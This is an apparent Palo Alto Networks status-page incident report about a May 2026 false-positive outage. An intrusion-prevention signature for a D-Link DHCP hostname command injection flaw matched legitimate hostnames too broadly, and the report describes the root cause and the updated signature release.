Palo Alto Networks experienced a notice incident on May 22, 2026, lasting 20h. The incident has been resolved; the full update timeline is below.
Update timeline
- resolved May 23, 2026, 01:05 AM UTC
Issue Description On May 21, 2026, customers reported their traffic being blocked due to TID 97011: “D-Link Router DHCP Hostname Command Injection Vulnerability”, the TID was designed to block OS Command Injection attempts within the hostname fields of DHCP requests. However, the signature included a broad command-matching filter that led to false positives across customer environments, as it incorrectly triggered on legitimate hostnames containing overlapping character strings. Findings and Technical Analysis The D-Link Router DHCP Hostname Command Injection Vulnerability (TID 97011) is an OS command injection flaw that allows command execution attempts through the DHCP Hostname fields. This vulnerability has coverage related to CVE-2025-69542 and CVE-2025-14659, such as the DIR-895LA1 which targets D-Link devices and DIR-860LB1, respectively. Previous Detection Logic The initial detection logic for TID 97011 included a command-filtering string within DHCP hostname fields that lacked strict boundary delimiters Root Cause The false positive (FP) occurred because the signature's command-validation logic triggered against legitimate hostnames containing the targeted command string as a substring. This broad matching behavior resulted in unintended traffic disruptions for multiple customers. Proposed Solutions & Mitigation We improved the signature logic to make it more resilient against false positives. The updated signature has been released with content 9105-10068.